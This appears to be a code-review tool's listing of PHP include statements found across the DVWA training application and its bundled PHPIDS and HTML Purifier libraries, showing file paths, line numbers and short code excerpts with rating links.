100:require 'HTMLPurifier/AttrDef/HTML/FrameTarget.php';
101:require 'HTMLPurifier/AttrDef/HTML/ID.php';
102:require 'HTMLPurifier/AttrDef/HTML/Pixels.php';
103:require 'HTMLPurifier/AttrDef/HTML/Length.php';
104:require 'HTMLPurifier/AttrDef/HTML/LinkTypes.php';
105:require 'HTMLPurifier/AttrDef/HTML/MultiLength.php';
106:require 'HTMLPurifier/AttrDef/HTML/Nmtokens.php';
107:require 'HTMLPurifier/AttrDef/URI/Email.php';
108:require 'HTMLPurifier/AttrDef/URI/Host.php';
109:require 'HTMLPurifier/AttrDef/URI/IPv4.php';
110:require 'HTMLPurifier/AttrDef/URI/IPv6.php';
111:require 'HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php';
112:require 'HTMLPurifier/AttrTransform/Background.php';
113:require 'HTMLPurifier/AttrTransform/BdoDir.php';
114:require 'HTMLPurifier/AttrTransform/BgColor.php';
115:require 'HTMLPurifier/AttrTransform/BoolToCSS.php';
116:require 'HTMLPurifier/AttrTransform/Border.php';
117:require 'HTMLPurifier/AttrTransform/EnumToCSS.php';
118:require 'HTMLPurifier/AttrTransform/ImgRequired.php';
119:require 'HTMLPurifier/AttrTransform/ImgSpace.php';
120:require 'HTMLPurifier/AttrTransform/Input.php';
121:require 'HTMLPurifier/AttrTransform/Lang.php';
122:require 'HTMLPurifier/AttrTransform/Length.php';
123:require 'HTMLPurifier/AttrTransform/Name.php';
124:require 'HTMLPurifier/AttrTransform/SafeEmbed.php';
125:require 'HTMLPurifier/AttrTransform/SafeObject.php';
126:require 'HTMLPurifier/AttrTransform/SafeParam.php';
127:require 'HTMLPurifier/AttrTransform/ScriptRequired.php';
128:require 'HTMLPurifier/AttrTransform/Textarea.php';
129:require 'HTMLPurifier/ChildDef/Chameleon.php';
130:require 'HTMLPurifier/ChildDef/Custom.php';
131:require 'HTMLPurifier/ChildDef/Empty.php';
132:require 'HTMLPurifier/ChildDef/Required.php';
133:require 'HTMLPurifier/ChildDef/Optional.php';
134:require 'HTMLPurifier/ChildDef/StrictBlockquote.php';
135:require 'HTMLPurifier/ChildDef/Table.php';
136:require 'HTMLPurifier/DefinitionCache/Decorator.php';
137:require 'HTMLPurifier/DefinitionCache/Null.php';
138:require 'HTMLPurifier/DefinitionCache/Serializer.php';
139:require 'HTMLPurifier/DefinitionCache/Decorator/Cleanup.php';
140:require 'HTMLPurifier/DefinitionCache/Decorator/Memory.php';
141:require 'HTMLPurifier/HTMLModule/Bdo.php';
142:require 'HTMLPurifier/HTMLModule/CommonAttributes.php';
143:require 'HTMLPurifier/HTMLModule/Edit.php';
144:require 'HTMLPurifier/HTMLModule/Forms.php';
145:require 'HTMLPurifier/HTMLModule/Hypertext.php';
146:require 'HTMLPurifier/HTMLModule/Image.php';
147:require 'HTMLPurifier/HTMLModule/Legacy.php';
148:require 'HTMLPurifier/HTMLModule/List.php';
149:require 'HTMLPurifier/HTMLModule/Name.php';
150:require 'HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php';
151:require 'HTMLPurifier/HTMLModule/Object.php';
152:require 'HTMLPurifier/HTMLModule/Presentation.php';
153:require 'HTMLPurifier/HTMLModule/Proprietary.php';
154:require 'HTMLPurifier/HTMLModule/Ruby.php';
155:require 'HTMLPurifier/HTMLModule/SafeEmbed.php';
156:require 'HTMLPurifier/HTMLModule/SafeObject.php';
157:require 'HTMLPurifier/HTMLModule/Scripting.php';
158:require 'HTMLPurifier/HTMLModule/StyleAttribute.php';
159:require 'HTMLPurifier/HTMLModule/Tables.php';
160:require 'HTMLPurifier/HTMLModule/Target.php';
161:require 'HTMLPurifier/HTMLModule/Text.php';
162:require 'HTMLPurifier/HTMLModule/Tidy.php';
163:require 'HTMLPurifier/HTMLModule/XMLCommonAttributes.php';
164:require 'HTMLPurifier/HTMLModule/Tidy/Name.php';
165:require 'HTMLPurifier/HTMLModule/Tidy/Proprietary.php';
166:require 'HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php';
167:require 'HTMLPurifier/HTMLModule/Tidy/Strict.php';
168:require 'HTMLPurifier/HTMLModule/Tidy/Transitional.php';
169:require 'HTMLPurifier/HTMLModule/Tidy/XHTML.php';
170:require 'HTMLPurifier/Injector/AutoParagraph.php';
171:require 'HTMLPurifier/Injector/DisplayLinkURI.php';
172:require 'HTMLPurifier/Injector/Linkify.php';
173:require 'HTMLPurifier/Injector/PurifierLinkify.php';
174:require 'HTMLPurifier/Injector/RemoveEmpty.php';
175:require 'HTMLPurifier/Injector/SafeObject.php';
176:require 'HTMLPurifier/Lexer/DOMLex.php';
177:require 'HTMLPurifier/Lexer/DirectLex.php';
178:require 'HTMLPurifier/Strategy/Composite.php';
179:require 'HTMLPurifier/Strategy/Core.php';
180:require 'HTMLPurifier/Strategy/FixNesting.php';
181:require 'HTMLPurifier/Strategy/MakeWellFormed.php';
182:require 'HTMLPurifier/Strategy/RemoveForeignElements.php';
183:require 'HTMLPurifier/Strategy/ValidateAttributes.php';
184:require 'HTMLPurifier/TagTransform/Font.php';
185:require 'HTMLPurifier/TagTransform/Simple.php';
186:require 'HTMLPurifier/Token/Comment.php';
187:require 'HTMLPurifier/Token/Tag.php';
188:require 'HTMLPurifier/Token/Empty.php';
189:require 'HTMLPurifier/Token/End.php';
190:require 'HTMLPurifier/Token/Start.php';
191:require 'HTMLPurifier/Token/Text.php';
192:require 'HTMLPurifier/URIFilter/DisableExternal.php';
193:require 'HTMLPurifier/URIFilter/DisableExternalResources.php';
194:require 'HTMLPurifier/URIFilter/HostBlacklist.php';
195:require 'HTMLPurifier/URIFilter/MakeAbsolute.php';
196:require 'HTMLPurifier/URIFilter/Munge.php';
197:require 'HTMLPurifier/URIScheme/ftp.php';
198:require 'HTMLPurifier/URIScheme/http.php';
199:require 'HTMLPurifier/URIScheme/https.php';
200:require 'HTMLPurifier/URIScheme/mailto.php';
201:require 'HTMLPurifier/URIScheme/news.php';
202:require 'HTMLPurifier/URIScheme/nntp.php';
203:require 'HTMLPurifier/VarParser/Flexible.php';
204:require 'HTMLPurifier/VarParser/Native.php';
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:6 (84/99) OK | Dubious | Bad | Hide 
3-/**
4- * @file
5- * This file was auto-generated by generate-includes.php and includes all of
6: * the core files required by HTML Purifier. This is a convenience stub that
7: * includes all files using dirname(__FILE__) and require_once. PLEASE DO NOT
8- * EDIT THIS FILE, changes will be overwritten the next time the script is run.
9- * 
10- * Changes to include_path are not necessary.
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.safe-includes.php:15 (85/99) OK | Dubious | Bad | Hide 
12-
13-$__dir = dirname(__FILE__);
14-
15:require_once $__dir . '/HTMLPurifier.php';
16:require_once $__dir . '/HTMLPurifier/AttrCollections.php';
17:require_once $__dir . '/HTMLPurifier/AttrDef.php';
18:require_once $__dir . '/HTMLPurifier/AttrTransform.php';
19:require_once $__dir . '/HTMLPurifier/AttrTypes.php';
20:require_once $__dir . '/HTMLPurifier/AttrValidator.php';
21:require_once $__dir . '/HTMLPurifier/Bootstrap.php';
22:require_once $__dir . '/HTMLPurifier/Definition.php';
23:require_once $__dir . '/HTMLPurifier/CSSDefinition.php';
24:require_once $__dir . '/HTMLPurifier/ChildDef.php';
25:require_once $__dir . '/HTMLPurifier/Config.php';
26:require_once $__dir . '/HTMLPurifier/ConfigSchema.php';
27:require_once $__dir . '/HTMLPurifier/ContentSets.php';
28:require_once $__dir . '/HTMLPurifier/Context.php';
29:require_once $__dir . '/HTMLPurifier/DefinitionCache.php';
30:require_once $__dir . '/HTMLPurifier/DefinitionCacheFactory.php';
31:require_once $__dir . '/HTMLPurifier/Doctype.php';
32:require_once $__dir . '/HTMLPurifier/DoctypeRegistry.php';
33:require_once $__dir . '/HTMLPurifier/ElementDef.php';
34:require_once $__dir . '/HTMLPurifier/Encoder.php';
35:require_once $__dir . '/HTMLPurifier/EntityLookup.php';
36:require_once $__dir . '/HTMLPurifier/EntityParser.php';
37:require_once $__dir . '/HTMLPurifier/ErrorCollector.php';
38:require_once $__dir . '/HTMLPurifier/ErrorStruct.php';
39:require_once $__dir . '/HTMLPurifier/Exception.php';
40:require_once $__dir . '/HTMLPurifier/Filter.php';
41:require_once $__dir . '/HTMLPurifier/Generator.php';
42:require_once $__dir . '/HTMLPurifier/HTMLDefinition.php';
43:require_once $__dir . '/HTMLPurifier/HTMLModule.php';
44:require_once $__dir . '/HTMLPurifier/HTMLModuleManager.php';
45:require_once $__dir . '/HTMLPurifier/IDAccumulator.php';
46:require_once $__dir . '/HTMLPurifier/Injector.php';
47:require_once $__dir . '/HTMLPurifier/Language.php';
48:require_once $__dir . '/HTMLPurifier/LanguageFactory.php';
49:require_once $__dir . '/HTMLPurifier/Length.php';
50:require_once $__dir . '/HTMLPurifier/Lexer.php';
51:require_once $__dir . '/HTMLPurifier/PercentEncoder.php';
52:require_once $__dir . '/HTMLPurifier/Strategy.php';
53:require_once $__dir . '/HTMLPurifier/StringHash.php';
54:require_once $__dir . '/HTMLPurifier/StringHashParser.php';
55:require_once $__dir . '/HTMLPurifier/TagTransform.php';
56:require_once $__dir . '/HTMLPurifier/Token.php';
57:require_once $__dir . '/HTMLPurifier/TokenFactory.php';
58:require_once $__dir . '/HTMLPurifier/URI.php';
59:require_once $__dir . '/HTMLPurifier/URIDefinition.php';
60:require_once $__dir . '/HTMLPurifier/URIFilter.php';
61:require_once $__dir . '/HTMLPurifier/URIParser.php';
62:require_once $__dir . '/HTMLPurifier/URIScheme.php';
63:require_once $__dir . '/HTMLPurifier/URISchemeRegistry.php';
64:require_once $__dir . '/HTMLPurifier/UnitConverter.php';
65:require_once $__dir . '/HTMLPurifier/VarParser.php';
66:require_once $__dir . '/HTMLPurifier/VarParserException.php';
67:require_once $__dir . '/HTMLPurifier/AttrDef/CSS.php';
68:require_once $__dir . '/HTMLPurifier/AttrDef/Enum.php';
69:require_once $__dir . '/HTMLPurifier/AttrDef/Integer.php';
70:require_once $__dir . '/HTMLPurifier/AttrDef/Lang.php';
71:require_once $__dir . '/HTMLPurifier/AttrDef/Switch.php';
72:require_once $__dir . '/HTMLPurifier/AttrDef/Text.php';
73:require_once $__dir . '/HTMLPurifier/AttrDef/URI.php';
74:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Number.php';
75:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/AlphaValue.php';
76:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Background.php';
77:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/BackgroundPosition.php';
78:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Border.php';
79:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Color.php';
80:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Composite.php';
81:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/DenyElementDecorator.php';
82:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Filter.php';
83:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Font.php';
84:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/FontFamily.php';
85:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ImportantDecorator.php';
86:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Length.php';
87:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/ListStyle.php';
88:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Multiple.php';
89:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/Percentage.php';
90:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/TextDecoration.php';
91:require_once $__dir . '/HTMLPurifier/AttrDef/CSS/URI.php';
92:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Bool.php';
93:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Color.php';
94:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/FrameTarget.php';
95:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/ID.php';
96:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Pixels.php';
97:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Length.php';
98:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/LinkTypes.php';
99:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/MultiLength.php';
100:require_once $__dir . '/HTMLPurifier/AttrDef/HTML/Nmtokens.php';
101:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email.php';
102:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Host.php';
103:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv4.php';
104:require_once $__dir . '/HTMLPurifier/AttrDef/URI/IPv6.php';
105:require_once $__dir . '/HTMLPurifier/AttrDef/URI/Email/SimpleCheck.php';
106:require_once $__dir . '/HTMLPurifier/AttrTransform/Background.php';
107:require_once $__dir . '/HTMLPurifier/AttrTransform/BdoDir.php';
108:require_once $__dir . '/HTMLPurifier/AttrTransform/BgColor.php';
109:require_once $__dir . '/HTMLPurifier/AttrTransform/BoolToCSS.php';
110:require_once $__dir . '/HTMLPurifier/AttrTransform/Border.php';
111:require_once $__dir . '/HTMLPurifier/AttrTransform/EnumToCSS.php';
112:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgRequired.php';
113:require_once $__dir . '/HTMLPurifier/AttrTransform/ImgSpace.php';
114:require_once $__dir . '/HTMLPurifier/AttrTransform/Input.php';
115:require_once $__dir . '/HTMLPurifier/AttrTransform/Lang.php';
116:require_once $__dir . '/HTMLPurifier/AttrTransform/Length.php';
117:require_once $__dir . '/HTMLPurifier/AttrTransform/Name.php';
118:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeEmbed.php';
119:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeObject.php';
120:require_once $__dir . '/HTMLPurifier/AttrTransform/SafeParam.php';
121:require_once $__dir . '/HTMLPurifier/AttrTransform/ScriptRequired.php';
122:require_once $__dir . '/HTMLPurifier/AttrTransform/Textarea.php';
123:require_once $__dir . '/HTMLPurifier/ChildDef/Chameleon.php';
124:require_once $__dir . '/HTMLPurifier/ChildDef/Custom.php';
125:require_once $__dir . '/HTMLPurifier/ChildDef/Empty.php';
126:require_once $__dir . '/HTMLPurifier/ChildDef/Required.php';
127:require_once $__dir . '/HTMLPurifier/ChildDef/Optional.php';
128:require_once $__dir . '/HTMLPurifier/ChildDef/StrictBlockquote.php';
129:require_once $__dir . '/HTMLPurifier/ChildDef/Table.php';
130:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator.php';
131:require_once $__dir . '/HTMLPurifier/DefinitionCache/Null.php';
132:require_once $__dir . '/HTMLPurifier/DefinitionCache/Serializer.php';
133:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php';
134:require_once $__dir . '/HTMLPurifier/DefinitionCache/Decorator/Memory.php';
135:require_once $__dir . '/HTMLPurifier/HTMLModule/Bdo.php';
136:require_once $__dir . '/HTMLPurifier/HTMLModule/CommonAttributes.php';
137:require_once $__dir . '/HTMLPurifier/HTMLModule/Edit.php';
138:require_once $__dir . '/HTMLPurifier/HTMLModule/Forms.php';
139:require_once $__dir . '/HTMLPurifier/HTMLModule/Hypertext.php';
140:require_once $__dir . '/HTMLPurifier/HTMLModule/Image.php';
141:require_once $__dir . '/HTMLPurifier/HTMLModule/Legacy.php';
142:require_once $__dir . '/HTMLPurifier/HTMLModule/List.php';
143:require_once $__dir . '/HTMLPurifier/HTMLModule/Name.php';
144:require_once $__dir . '/HTMLPurifier/HTMLModule/NonXMLCommonAttributes.php';
145:require_once $__dir . '/HTMLPurifier/HTMLModule/Object.php';
146:require_once $__dir . '/HTMLPurifier/HTMLModule/Presentation.php';
147:require_once $__dir . '/HTMLPurifier/HTMLModule/Proprietary.php';
148:require_once $__dir . '/HTMLPurifier/HTMLModule/Ruby.php';
149:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeEmbed.php';
150:require_once $__dir . '/HTMLPurifier/HTMLModule/SafeObject.php';
151:require_once $__dir . '/HTMLPurifier/HTMLModule/Scripting.php';
152:require_once $__dir . '/HTMLPurifier/HTMLModule/StyleAttribute.php';
153:require_once $__dir . '/HTMLPurifier/HTMLModule/Tables.php';
154:require_once $__dir . '/HTMLPurifier/HTMLModule/Target.php';
155:require_once $__dir . '/HTMLPurifier/HTMLModule/Text.php';
156:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy.php';
157:require_once $__dir . '/HTMLPurifier/HTMLModule/XMLCommonAttributes.php';
158:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Name.php';
159:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Proprietary.php';
160:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTMLAndHTML4.php';
161:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Strict.php';
162:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/Transitional.php';
163:require_once $__dir . '/HTMLPurifier/HTMLModule/Tidy/XHTML.php';
164:require_once $__dir . '/HTMLPurifier/Injector/AutoParagraph.php';
165:require_once $__dir . '/HTMLPurifier/Injector/DisplayLinkURI.php';
166:require_once $__dir . '/HTMLPurifier/Injector/Linkify.php';
167:require_once $__dir . '/HTMLPurifier/Injector/PurifierLinkify.php';
168:require_once $__dir . '/HTMLPurifier/Injector/RemoveEmpty.php';
169:require_once $__dir . '/HTMLPurifier/Injector/SafeObject.php';
170:require_once $__dir . '/HTMLPurifier/Lexer/DOMLex.php';
171:require_once $__dir . '/HTMLPurifier/Lexer/DirectLex.php';
172:require_once $__dir . '/HTMLPurifier/Strategy/Composite.php';
173:require_once $__dir . '/HTMLPurifier/Strategy/Core.php';
174:require_once $__dir . '/HTMLPurifier/Strategy/FixNesting.php';
175:require_once $__dir . '/HTMLPurifier/Strategy/MakeWellFormed.php';
176:require_once $__dir . '/HTMLPurifier/Strategy/RemoveForeignElements.php';
177:require_once $__dir . '/HTMLPurifier/Strategy/ValidateAttributes.php';
178:require_once $__dir . '/HTMLPurifier/TagTransform/Font.php';
179:require_once $__dir . '/HTMLPurifier/TagTransform/Simple.php';
180:require_once $__dir . '/HTMLPurifier/Token/Comment.php';
181:require_once $__dir . '/HTMLPurifier/Token/Tag.php';
182:require_once $__dir . '/HTMLPurifier/Token/Empty.php';
183:require_once $__dir . '/HTMLPurifier/Token/End.php';
184:require_once $__dir . '/HTMLPurifier/Token/Start.php';
185:require_once $__dir . '/HTMLPurifier/Token/Text.php';
186:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternal.php';
187:require_once $__dir . '/HTMLPurifier/URIFilter/DisableExternalResources.php';
188:require_once $__dir . '/HTMLPurifier/URIFilter/HostBlacklist.php';
189:require_once $__dir . '/HTMLPurifier/URIFilter/MakeAbsolute.php';
190:require_once $__dir . '/HTMLPurifier/URIFilter/Munge.php';
191:require_once $__dir . '/HTMLPurifier/URIScheme/ftp.php';
192:require_once $__dir . '/HTMLPurifier/URIScheme/http.php';
193:require_once $__dir . '/HTMLPurifier/URIScheme/https.php';
194:require_once $__dir . '/HTMLPurifier/URIScheme/mailto.php';
195:require_once $__dir . '/HTMLPurifier/URIScheme/news.php';
196:require_once $__dir . '/HTMLPurifier/URIScheme/nntp.php';
197:require_once $__dir . '/HTMLPurifier/VarParser/Flexible.php';
198:require_once $__dir . '/HTMLPurifier/VarParser/Native.php';
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.kses.php:8 (86/99) OK | Dubious | Bad | Hide 
5- * Emulation layer for code that used kses(), substituting in HTML Purifier.
6- */
7-
8:require_once dirname(__FILE__) . '/HTMLPurifier.auto.php';
9-
10-function kses($string, $allowed_html, $allowed_protocols = null) {
11-    $config = HTMLPurifier_Config::createDefault();
./external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier.auto.php:8 (87/99) OK | Dubious | Bad | Hide 
5- */
6-
7-set_include_path(dirname(__FILE__) . PATH_SEPARATOR . get_include_path() );
8:require_once 'HTMLPurifier/Bootstrap.php';
9:require_once 'HTMLPurifier.autoload.php';
./external/phpids/0.6/lib/IDS/Log/Composite.php:34 (88/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Log Composite
./external/phpids/0.6/lib/IDS/Log/File.php:34 (89/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * File logging wrapper
./external/phpids/0.6/lib/IDS/Log/File.php:140 (90/99) OK | Dubious | Bad | Hide 
137-     * Prepares data
138-     *
139-     * Converts given data into a format that can be stored into a file. 
140:     * You might edit this method to your requirements.
141-     *
142-     * @param mixed $data incoming report data
143-     *
./external/phpids/0.6/lib/IDS/Log/Email.php:34 (91/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/**
37- * Email logging wrapper
./external/phpids/0.6/lib/IDS/Log/Email.php:264 (92/99) OK | Dubious | Bad | Hide 
261-     * Prepares data
262-     *
263-     * Converts given data into a format that can be read in an email.
264:     * You might edit this method to your requirements.
265-     *
266-     * @param mixed $data the report data
267-     *
./external/phpids/0.6/lib/IDS/Log/Database.php:34 (93/99) OK | Dubious | Bad | Hide 
31- * @link     http://php-ids.org/
32- */
33-
34:require_once 'IDS/Log/Interface.php';
35-
36-/*
37- * Needed SQL:
./setup.php:4 (94/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-
./phpinfo.php:3 (95/99) OK | Dubious | Bad | Hide 
1-<?php
2-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
3:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
4-
5-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
6-
./dvwa/includes/dvwaPage.inc.php:15 (96/99) OK | Dubious | Bad | Hide 
12-
13-
14-// Include configs
15:require_once DVWA_WEB_PAGE_TO_ROOT.'config/config.inc.php';
16-
17:require_once( 'dvwaPhpIds.inc.php' );
18-
19-// Declare the $html variable
20-if(!isset($html)){
./dvwa/includes/dvwaPhpIds.inc.php:14 (97/99) OK | Dubious | Bad | Hide 
11-// Add PHPIDS to include path
12-set_include_path( get_include_path().PATH_SEPARATOR.DVWA_WEB_PAGE_TO_PHPIDS.'lib/' );
13-
14:require_once 'IDS/Init.php';
15-
16-function dvwaPhpIdsVersionGet() {
17-	return '0.6';
./dvwa/includes/dvwaPhpIds.inc.php:74 (98/99) OK | Dubious | Bad | Hide 
71-		$result = $ids->run();
72-
73-		if (!$result->isEmpty()) {
74:			require_once 'IDS/Log/File.php';
75:			require_once 'IDS/Log/Composite.php';
76-
77-			$compositeLog = new IDS_Log_Composite();
78-			$compositeLog->addLogger(IDS_Log_File::getInstance($init));
./logout.php:4 (99/99) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'phpids' ) );
7-

require_once (58) Top | Hide

./instructions.php:4 (1/58) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./index.php:5 (2/58) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
8-
./login.php:5 (3/58) OK | Dubious | Bad | Hide 
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4-
5:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
6-
7-dvwaPageStartup( array( 'phpids' ) );
8-
./ids_log.php:4 (4/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-define( 'DVWA_WEB_ROOT_TO_PHPIDS_LOG', 'external/phpids/'.dvwaPhpIdsVersionGet().'/lib/IDS/tmp/phpids_log.txt' );
7-define( 'DVWA_WEB_PAGE_TO_PHPIDS_LOG', DVWA_WEB_PAGE_TO_ROOT.DVWA_WEB_ROOT_TO_PHPIDS_LOG );
./about.php:4 (5/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./security.php:4 (6/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:4 (7/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/csrf/index.php:30 (8/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/csrf/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'csrf';
33-$page[ 'source_button' ] = 'csrf';
./vulnerabilities/fi/index.php:4 (9/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/fi/index.php:30 (10/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/fi/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'fi';
33-$page[ 'source_button' ] = 'fi';
./vulnerabilities/sqli_blind/index.php:4 (11/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/sqli_blind/index.php:30 (12/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/sqli_blind/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'sqli_blind';
33-$page[ 'source_button' ] = 'sqli_blind';
./vulnerabilities/view_source.php:4 (13/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:4 (14/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/brute/index.php:30 (15/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/brute/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'brute';
33-$page[ 'source_button' ] = 'brute';
./vulnerabilities/exec/index.php:4 (16/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/exec/index.php:30 (17/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/exec/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'exec';
33-$page[ 'source_button' ] = 'exec';
./vulnerabilities/upload/index.php:4 (18/58) OK | Dubious | Bad | Hide 
1-<?php
2-
3-define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' );
4:require_once DVWA_WEB_PAGE_TO_ROOT.'dvwa/includes/dvwaPage.inc.php';
5-
6-dvwaPageStartup( array( 'authenticated', 'phpids' ) );
7-
./vulnerabilities/upload/index.php:30 (19/58) OK | Dubious | Bad | Hide 
27-		break;
28-}
29-
30:require_once DVWA_WEB_PAGE_TO_ROOT."vulnerabilities/upload/source/{$vulnerabilityFile}";
31-
32-$page[ 'help_button' ] = 'upload';
